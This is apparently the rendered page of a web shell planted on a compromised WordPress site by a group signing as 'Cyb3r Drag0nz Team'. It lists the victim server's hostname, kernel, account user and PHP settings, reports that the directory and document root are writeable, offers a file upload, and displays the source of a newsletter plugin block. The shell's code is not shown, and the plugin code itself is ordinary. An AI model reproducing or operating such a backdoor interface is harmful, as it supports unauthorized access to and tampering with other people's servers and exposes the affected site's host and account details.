Server :
Apache
System :
Linux webd003.cluster126.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
User :
atwiofrxug (73666)
PHP Version :
8.4.10
Disable Functions :
_dyuweyrj4,_dyuweyrj4r,dl
Current Directory :
/home/atwiofrxug/mylittletelaviv/wp-content/plugins/newsletter/emails/blocks/html/
Directory Status:
Writeable | Document Root:
Writeable
Upload File
Viewing: /home/atwiofrxug/mylittletelaviv/wp-content/plugins/newsletter/emails/blocks/html/block.php
<?php
/*
* Name: Html
* Section: content
* Description: Free HTML block
*
*/
/* @var $options array */
/* @var $wpdb wpdb */
$default_options = array(
'html'=>'<p>My <strong>HTML</strong> code<p>'
);
$options = array_merge($default_options, $options);
?>
<table width="100%" border="0" cellpadding="0" align="center" cellspacing="0">
<tr>
<td width="100%" valign="top" align="center">
<?php echo $options['html'] ?>
</td>
</tr>
</table>
Cyb3r Drag0nz Team • Google Edition